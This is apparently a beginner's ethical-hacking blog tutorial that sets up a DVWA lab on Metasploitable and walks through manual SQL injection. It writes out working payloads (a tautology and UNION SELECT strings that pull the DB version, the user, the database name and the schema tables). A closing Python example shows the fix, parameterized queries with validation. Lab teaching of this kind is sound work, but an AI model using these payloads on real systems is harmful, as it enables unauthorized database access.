SQL injection lab PT.1 – Intro/Lab setup – HC NEPAL


Hello Gurkhas ! ! !

By: Bijay Acharya | Add him on Facebook here > https://www.facebook.com/nhcbijay.ach | Follow him on Twitter: @acharya_bijay | Subscribe to his tutorial channel for ethical hacking videos (in Nepali language) here > Student Video Tutorial

In this lab, we'll begin the series on SQL Injection. This will be a part-wise article/guide on SQL Injection.

  • Let’s start from LAB setup :
    > Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
    > Check IP address of both devices.
  • Step-by-step instruction
    1. Open Kali Linux (or BT 5r3)
    2. Open your browser and type http://<IP address of Metasploitable>/dvwa/login.php
    3. Login with user name “admin” and password “password”
    4. Click on DVWA Security and set it to low then submit
    5. Click on manual SQL injection
    6. In the User ID box, type 1 and Submit
    (PHP select statement: $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";)
    7. In the User ID box, type: %' or '0'='0
    (mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';)
    8. Get DB version: %' or 0=0 union select null, version() #
    9. Get DB user: %' or 0=0 union select null, user() #
    10. Get DB name: %' or 0=0 union select null, database() #
    11. Get schema information: %' and 1=0 union select null, table_name from information_schema.tables #
  • MORE here > http://lab.hcnepal.com/2016/08/24/sql-injection-lab-pt-1-introlab-setup-hc-nepal/
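
The difference between the concatenated SELECT from step 6 and a bound parameter, as an added example that is not part of the original lab. It uses Python's sqlite3 as a stand-in for DVWA's PHP/MySQL; the table rows, function names and the integer-only ID rule are assumptions made for illustration.

```python
import re
import sqlite3

# Input from step 7 of the lab above.
STEP7_INPUT = "%' or '0'='0"

def make_db():
    """In-memory stand-in for DVWA's users table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1", "Alice", "Admin"), ("2", "Bob", "Builder"), ("3", "Carol", "Clerk")],
    )
    return db

def lookup_vulnerable(db, user_id):
    """Same pattern as the PHP statement in step 6: input pasted into the SQL text."""
    query = ("SELECT first_name, last_name FROM users "
             "WHERE user_id = '" + user_id + "'")
    return db.execute(query).fetchall()

def lookup_parameterized(db, user_id):
    """Input is bound as a value, so quotes in it are data, not SQL syntax."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_id,)).fetchall()

def lookup_validated(db, user_id):
    """Defence in depth: assume user IDs are decimal integers and reject the rest."""
    if not re.fullmatch(r"[0-9]{1,10}", user_id):
        raise ValueError("user_id must be a decimal integer")
    return lookup_parameterized(db, user_id)

if __name__ == "__main__":
    db = make_db()
    for label, fn in [("vulnerable", lookup_vulnerable),
                      ("parameterized", lookup_parameterized)]:
        print(label, "id=1   ->", fn(db, "1"))
        print(label, "step 7 ->", fn(db, STEP7_INPUT))
    try:
        lookup_validated(db, STEP7_INPUT)
    except ValueError as err:
        print("validated step 7 -> rejected:", err)
```

With the concatenated query the step 7 input returns every row, because `'0'='0'` is evaluated as SQL; with the bound parameter the same input matches no row.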